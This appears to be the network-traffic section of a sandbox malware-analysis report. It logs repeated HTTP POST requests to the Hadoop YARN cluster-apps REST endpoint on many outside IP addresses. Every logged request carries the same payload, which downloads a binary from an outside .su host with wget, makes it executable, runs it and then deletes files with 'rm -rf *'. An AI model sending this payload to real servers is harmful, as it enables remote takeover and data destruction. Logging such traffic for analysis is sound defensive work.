                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:15.234850883 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:24.453568935 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 204.235.25.185:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                27192.168.2.2341746254.30.40.988088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:08.886118889 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:09.155649900 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:09.443618059 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:09.987520933 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:11.075409889 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:13.443080902 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:17.794507980 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:26.497301102 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:43.903008938 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:40:18.714324951 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.30.40.98:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                28192.168.2.2335558142.172.118.1118088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:14.891853094 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 142.172.118.111:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:15.143017054 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 142.172.118.111:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                29192.168.2.2354394112.144.139.778088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:17.894182920 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 112.144.139.77:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                30192.168.2.233894294.201.90.868088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:39:20.896015882 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 94.201.90.86:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:21.134041071 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 94.201.90.86:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:39:21.373992920 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 94.201.90.86:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
